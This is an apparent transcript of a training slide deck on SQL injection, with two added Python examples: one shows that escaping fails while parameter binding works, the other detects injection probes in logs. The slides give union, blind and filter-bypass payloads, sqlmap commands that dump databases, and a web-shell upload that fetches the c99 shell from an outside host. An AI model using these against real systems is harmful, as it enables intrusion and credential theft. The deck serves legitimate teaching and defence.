Practical Approach towards SQLi ppt

Sql injection , types of sqli injection , hands on

  1. SQL Injection
  2. #whoami: Ahamed Saleem, @saleem14489, Security Researcher @CDAC
  3. Agenda
     ● What is SQL injection
     ● Types of SQL injection
       – Error based injection (string, numeric, union, error)
       – Time based blind SQLi
       – Boolean based blind SQLi
       – Cookie based injection
       – Compromising the database server using SQLi (uploading a shell)
       – Exploitation using sqlmap
       – Bypassing filters to successfully exploit SQLi
  4. Baa, baa, black hat, have you any sploits? Yes, sir, yes, sir, 3 bulletproof choices: one for Java, one for IE, one for Chrome (ha ha ha)
  5. What Is SQL?
     ➔ Structured Query Language, designed for managing data held in a relational database management system (RDBMS).
     ➔ The scope of SQL includes data insert, update and delete, schema creation and modification, and data access control.
  6. Definition Of SQL Injection
     Def: "SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands."
     Cause: it is a flaw in web application development, not a DB or web server problem
     → most programmers are still not aware of this problem
     → a lot of the solutions posted on the internet are not good enough
  7. Anatomy Of SQL Injection
     ● Error based
     ● Blind based
       – Boolean based
       – Time based
  8. © C-DAC, Hyderabad - 2013. SQL Injection – Illustrated (diagram: the HTTP request passes the firewall, hardened OS, web server, app server and custom code before reaching the databases, legacy systems, web services and directories at the application layer)
     Example injected query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
     1. Application presents a form to the attacker
     2. Attacker sends an attack in the form data
     3. Application forwards attack to the database in a SQL query
     4. Database runs query containing attack and sends encrypted results back to application
     5. Application decrypts data as normal and sends results to the user
  9. OWASP Top 10
  10. Myths
      ● Escaping input prevents SQL injection
      ● SQL injection is an old problem, so I don't have to worry about it
  11. Error Based Injections: error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application, and this error aids in successful exploitation.
  12. A methodological approach is always helpful in understanding the underlying logic. The major process is as follows:
      1. Enumerate the application behavior
      2. Fuzz the application with bogus data with the goal of crashing the application
      3. Try to control the injection point by guessing the query used in the back-end
      4. Extract the data from the back-end database
      Enough theory, time for some action. Demo
  13. ● Id = 1' --+
      ● id=1' AND 1=1 --+
      ● id=1' union select 1,2,3 --+
      ● id=999' union select 1,2,3 --+
      ● id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+
      ● id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
      ● id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
      ● id=-1' union select 1,group_concat(username), group_concat(password) from users --+
  14. Blind Injections: blind SQL injections are those in which the backend database reacts to the input, but the errors are concealed by the web application and not displayed to the end users.
      Boolean based: the information must be inferred from the behavior of the page by asking the server true/false questions
      Time based: gain information by observing timing delays in the response of the database
  15. Boolean Based Injections
      ● select ascii(substr(database(),1,1));
      ● id=1' AND (ascii(substr((select database()),3,1))) = 99 --+
      ● id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
  16. Time Based Injections
      ● id=1' and if((select database()="security"), sleep(10),null) --+
      ● id=1' and if ((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+
  17. Uploading shell
      http://localhost/sqli-labs-master/Less-1/?id=-1' union select "","","<?system($_REQUEST['cmd'];?>" into outfile '/var/www/shell.php' --+
      http://localhost/shell.php? cmd=wget http://www.r57shell.net/shell/c99.txt
  18. sqlmap detects and exploits SQLi flaws. Features:
      ● Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server
      ● Three SQL injection techniques:
        – Boolean-based
        – Union queries
        – Batched queries
      ● Performs an extensive back-end DBMS fingerprint
  19. sqlmap detects and exploits SQLi flaws (continued)
      ● Enumerates users, password hashes, privileges, databases, tables, columns and their data types
      ● Dumps entire or user-specified database table entries
      ● Runs custom SQL statements
  20. Dishum Dishum using SQLMAP
  21. – First detect the vulnerable URLs
      – Now use sqlmap:
        1. python sqlmap.py -u http://site.com/?id=1 {identify whether SQLi is present or not}
        2. python sqlmap.py -u http://site.com/?id=1 --dbs {discover databases}
        3. ./sqlmap -u http://site.com/?id=1 --tables -D <db name> {tables in db}
        4. ./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name>
        5. ./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name> {data
  22. Uploading Shell Using SQLMap:
      1. Check whether the current user is DBA or not:
         ./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user --is-dba
      2. Now enter the webserver path:
         ./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1
      3. Now the webshell can be loaded using the sqlmap file stager. DEMO
  23. Bypassing the blacklist filters. Bypass AND and OR:
      ● Id=1' || 1=1 --+
      ● id=1' %26%26 1=1 --+
  24. Hands On
  25. Methodology
      ● Break it – try to break the query by fuzzing
      ● Fix it – now, based on the error, try to balance and fix the query
  26. What did we cover?
      ✔ What is SQL injection
      ✔ Types of SQL injection
      ✔ Hands on
  27. Further Roadmap
      * Websites and references: OWASP, WASC, MSDN
      * Books and mailing lists: Web Application Hacker's Handbook, OWASP Guides
      * Tools to use: Burp, Paros, Firefox extensions, VirtualBox, Linux
  28. Acknowledgements: @Sqlilabs, @Google, @Nullhyd, @cswan, @thenounproject
  29. Thank You: @saleem14489, Facebook.com/ahamedssaleem, Saleem4u.ahamed@gmail.com
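The "escaping input prevents SQL injection" myth from slide 10, worked through as an added example (Python with an in-memory SQLite table; this is not code from the slides or from sqli-labs). Doubling single quotes does stop the quoted-string payload, which is why the myth persists, but it does nothing in a numeric context such as the id parameter the slides attack; type validation plus parameter binding is what closes that hole. The users table and its rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the users table the slides dump; in-memory SQLite."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pw")])
    return con


def escape(value):
    """The 'escaping' of the myth: double every single quote. Only helps inside a quoted string."""
    return value.replace("'", "''")


def lookup_by_name_escaped(con, name):
    # String context: escaping does neutralise the classic ' OR 1=1 -- payload here,
    # because the quote that would have ended the literal is doubled.
    sql = "SELECT username FROM users WHERE username = '" + escape(name) + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_by_id_escaped(con, user_id):
    # Numeric context: id is concatenated without quotes, so a payload that contains
    # no quote character (1 OR 1=1) passes escaping untouched and runs as SQL.
    sql = "SELECT username FROM users WHERE id = " + escape(user_id)
    return [row[0] for row in con.execute(sql)]


def lookup_by_id_parameterized(con, user_id):
    # The fix: validate the type the column expects, then bind the value as a
    # parameter so the database never parses it as part of the statement.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    rows = con.execute("SELECT username FROM users WHERE id = ?", (uid,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    con = make_db()
    print(lookup_by_name_escaped(con, "' OR 1=1 --"))   # []  escaping worked in string context
    print(lookup_by_id_escaped(con, "1 OR 1=1"))        # ['alice', 'bob', 'carol']  every row leaks
    print(lookup_by_id_parameterized(con, "1 OR 1=1"))  # []  rejected before it reaches SQL
```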

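Detection rather than exploitation: an added example (not from the slides) that scans constructed web-server log lines for the probe patterns of slides 13 to 16 and 23, URL-decoding each request path before matching so that the %26%26 spelling of && from the filter-bypass slide is caught as well. The log lines and the signature list are constructed for this example and are not a product ruleset.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe styles the slides walk through: union queries, schema
# enumeration, boolean- and time-based blind probes, and AND/OR tautologies in
# their word and &&/|| spellings (slide 23). Constructed for this example.
SIGNATURES = [
    ("union-based",   re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum",   re.compile(r"\binformation_schema\.", re.I)),
    ("boolean-blind", re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I)),
    ("time-blind",    re.compile(r"\bsleep\s*\(\s*\d+", re.I)),
    ("tautology",     re.compile(r"(\b(and|or)\b|&&|\|\|)\s*1\s*=\s*1", re.I)),
]

# Common log format; only the request path is inspected.
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$')


def classify_request(path):
    """Return the signature names that match the URL-decoded request path."""
    # Decode first: %26%26 is && and %27 is ', so matching the raw path would miss them.
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines):
    """Return (path, tags) for every parseable log line matching at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("path"))
        if tags:
            hits.append((m.group("path"), tags))
    return hits


# Constructed sample log: the probes from the slides aimed at the sqli-labs Less-1 page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2013:10:01:01 +0530] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2013:10:01:02 +0530] "GET /sqli-labs-master/Less-1/?id=1%27%20AND%201=1%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2013:10:01:03 +0530] "GET /sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200 740
10.0.0.5 - - [12/Mar/2013:10:01:04 +0530] "GET /sqli-labs-master/Less-1/?id=1%27%20AND%20(ascii(substr((select%20database()),3,1)))%20=%2099%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2013:10:01:05 +0530] "GET /sqli-labs-master/Less-1/?id=1%27%20and%20if((select%20database()=%22security%22),sleep(10),null)%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2013:10:01:06 +0530] "GET /sqli-labs-master/Less-1/?id=1%27%20%26%26%201=1%20--+ HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(", ".join(tags), "<-", unquote_plus(path))
```

The first sample line is the legitimate request and produces no hit; each of the other five is tagged with exactly the technique the corresponding slide describes.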